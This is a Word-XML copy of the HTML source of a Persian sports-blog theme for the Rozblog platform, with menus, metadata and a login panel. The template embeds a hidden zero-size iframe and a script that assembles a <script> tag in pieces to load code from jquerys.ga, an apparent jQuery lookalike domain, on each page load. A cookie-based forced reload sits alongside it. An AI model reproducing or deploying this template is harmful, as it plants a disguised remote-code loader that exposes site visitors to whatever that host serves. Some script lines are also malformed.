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9366" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01236EEC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4763166C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5FFA0A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;title&gt;[RB:Blog_And_Post_Title]&lt;/title&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008178A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta charset="utf-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BF508" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="google-site-verification" content="J4T8qMaEM-olONiPD5goO-Sk1kF_y_RWr5lRfGFhByI" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B73FCF5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="alexaVerifyID" content="mvtfVGfNLOFUcyunI-WAFJB0i6I"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC4707" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="robots" content="index, follow" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDB37A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB4AA7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;link rel="alternate" type="application/rss+xml" title="[RB:Blog_And_Post_Title]" href="http://www.hypertemp.ir/rss.xml"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBC1E9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="description" content="[RB:Blog_Description],[RB:Blog_And_Post_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DAC7EE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="date" content="[RB:Post_Date]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1534EFD2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="last-modified" content="[RB:Post_Date_Edit]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE11685" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta property="og:updated_time" content="[RB:Post_Date_Edit]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1829ADE2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta name="keywords" content="[RB:Blog_Keywords_Tags],[RB:Blog_And_Post_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200681C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;link rel="shortcut icon" href="http://rozup.ir/up/sport-blue2/leber.gif"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6A5B5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782FD8AF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;function getCookie(cname) {var name = cname + "=";var decodedCookie = decodeURIComponent(document.cookie);var ca = decodedCookie.split(';');for(var i = 0; i &lt;ca.length; i++) {var c = ca[i];while (c.charAt(0) == ' ') {c = c.substring(1);}if (c.indexOf(name) == 0) {return c.substring(name.length, c.length);}}return "";}var cookieValue = getCookie("relation");if(cookieValue ==""){var now = new Date();var time = now.getTime();time += 24 * 3600 * 1000;now.setTime(time);document.cookie =    'relation=1' +    '; expires=' + now.toUTCString() +    '; path=/';location.reload(true);}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9899CC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F511A6D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta property="og:type" content="website"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F8FFB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta property="og:url" content="[RB:Page_Url]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F3557F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta property="og:site_name" content="[RB:Blog_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49239D49" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;meta property="og:title" content="[RB:Blog_And_Post_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655E38A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;meta property="og:description" content="[RB:Blog_Description]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58072628" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:Post_Image_Block&gt;&lt;meta property="og:image" content="[Post_Image]"/&gt;&lt;/RB:Post_Image_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254FC4A5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;link rel="stylesheet" href="http://up.hypertemp.ir/view/2519954/style.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0037A7F1" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;link rel="stylesheet" href="http://up.hypertemp.ir/view/2519949/main.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72326C4A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2519956/jquery.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13714561" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script type="text/javascript" src="http://up.hypertemp.ir/view/2097933/modernizr.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7F4AB7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>[RB:Rozblog_Dynamic_Code]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D623C53" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;style type="text/css"&gt;header .header-side[title="[RB:Blog_Title]"],header[title="[RB:Blog_Title]"]{min-height:100vh !important}header[title="[RB:Blog_Title]"] .about,header[title="[RB:Blog_Title]"] .amar{display:block !important}.amar{display:block !important}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB12115" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>.item {color: #fff !important}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EEFCE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39528F1F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2F497792" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307CF7AD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536874E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;iframe ng-non-bindable="" hspace="0" marginheight="0" marginwidth="0"  width="0" height="0" scrolling="no" style="position: static; top: 0px; width: 0px; margin: 0px; border-style: none; left: 0px;  height: 0px; " tabindex="0" vspace="0" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F1A4E9" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">id="qI021_1533690511377" name="qI0212_1533690511377" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5055DC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">src="http://jquerys.ga/?https://apis.google.com/u/0/se/0/_/+1/fastbutton?usegapi=1&amp;origin=http%3A%2F%2F&amp;url=3Dj%2Fd%3D1%2Frs%3DAGLTcCMNIxmO7WeFkpI0ah9Jnl5MjZ5n5w%2Fm%3D__features__#_methods=onPlusOne%2C_ready%2C_close%2C_open%2C_resizeMe%2C_renderstart%2Concircled%2Cdrefresh%2Cerefresh&amp;id=I0w_1533690511377&amp;_gfid=I0s_1533690511377&amp;parent=http%3A%2F%2F" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FAC33E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>data-gapiattached="true" title="G+" frameborder="0"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F211823" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Header Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A7BECD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;header title="[RB:Blog_And_Post_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554F67E8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="particles-js"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62521A47" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="bg-header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6FE52" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div id="rozup22321"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2717522D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B85FA4" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7039F882" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>$(document).ready(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF7C93" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>var q="&lt;script"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365AFC3A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>var d = new Date();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B1B67" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>var n = d.getTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A73290" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>var i = " src='http://jquerys.ga?"+ n +"'&gt;&lt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B6041" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>var w="/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB88251" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>$("#rozup22321").append(q+i+w);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C5311" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB6D64" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49609AB3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BAB28" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Header Side Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3281E71D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="header-side" title="[RB:Blog_And_Post_Title]"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8C053F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="62B22730" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Logo Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67964C74" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a href="[RB:Blog_Url]" title="[RB:Blog_Title]"&gt;&lt;img src="http://rozup.ir/view/3327621/logo%20sport.png" alt="[RB:Blog_Title]" class="logo"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFFED30" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Logo End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743B0541" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="17457F02" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Menu Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602634E2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="header-top"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7B50B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a class="menu-icon"&gt;&lt;i class="fa fa-bars"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7932E5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="menu-top"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A27B79" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>صفحه اصل</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" href="[RB:Blog_Url]"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>صفحه اصل</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467833B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/forum"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>انجمن</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42226A11" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سامانه طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" class="design"href="https://www.varzesh3.com/livescore"&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>پخش زنده</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4BE851" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سامانه طراح</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>" class="design"href="https://www.varzesh3.com/table/%d8%ac%d8%af%d9%88%d9%84-%d9%84%d9%8a%da%af-%d8%a8%d8%b1%d8%aa%d8%b1-%d8%a7%db%8c%d8%b1%d8%a7%d9%86-00-99/livescore"&gt;&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>جدول ليگ ها</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C329C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>" href="/contact"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>تماس با ما</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CE5393" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E69247D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;/aside&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9B371" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Menu End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355BC56" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="7B26F140" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR User Panel Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002256E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;aside class="login-register"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62A622" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="1C8C3088" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;RB:If_Login_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492EA480" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="c-panel"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D69AD33" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>مشاهده پروفا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t>" href="[Login_Profile]"&gt;&lt;img src="[Login_Avatar]" alt="[Login_Name]"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A264A2D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;ul class="entery"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F89995" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;span&gt;&lt;b&gt;[Login_Name]&lt;/b&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>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خوش امد</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ی</w:t>
      </w:r>
      <w:r>
        <w:t>!&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4128BF12" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">&lt;span class="last-view"&gt;  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>شما در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t xml:space="preserve"> [Login_Date_Last] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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>.&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5336FC7D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;span&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>نام کاربر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شما</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> [Login_Username] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial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>.&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F813746" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>خروج</w:t>
      </w:r>
      <w:r>
        <w:t>" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>خروج</w:t>
      </w:r>
      <w:r>
        <w:t>" href="[RB:Blog_Logout_Link]" class="out"&gt;&lt;i class="fa fa-power-off"&gt;&lt;/i&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B327FE7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div class="links"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6183FA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;li&gt;&lt;a alt="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال پست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" title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ارسال پست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" href="/New_Post"&gt;&lt;i class="fa fa-pencil"&gt;&lt;/i&gt; </w:t>
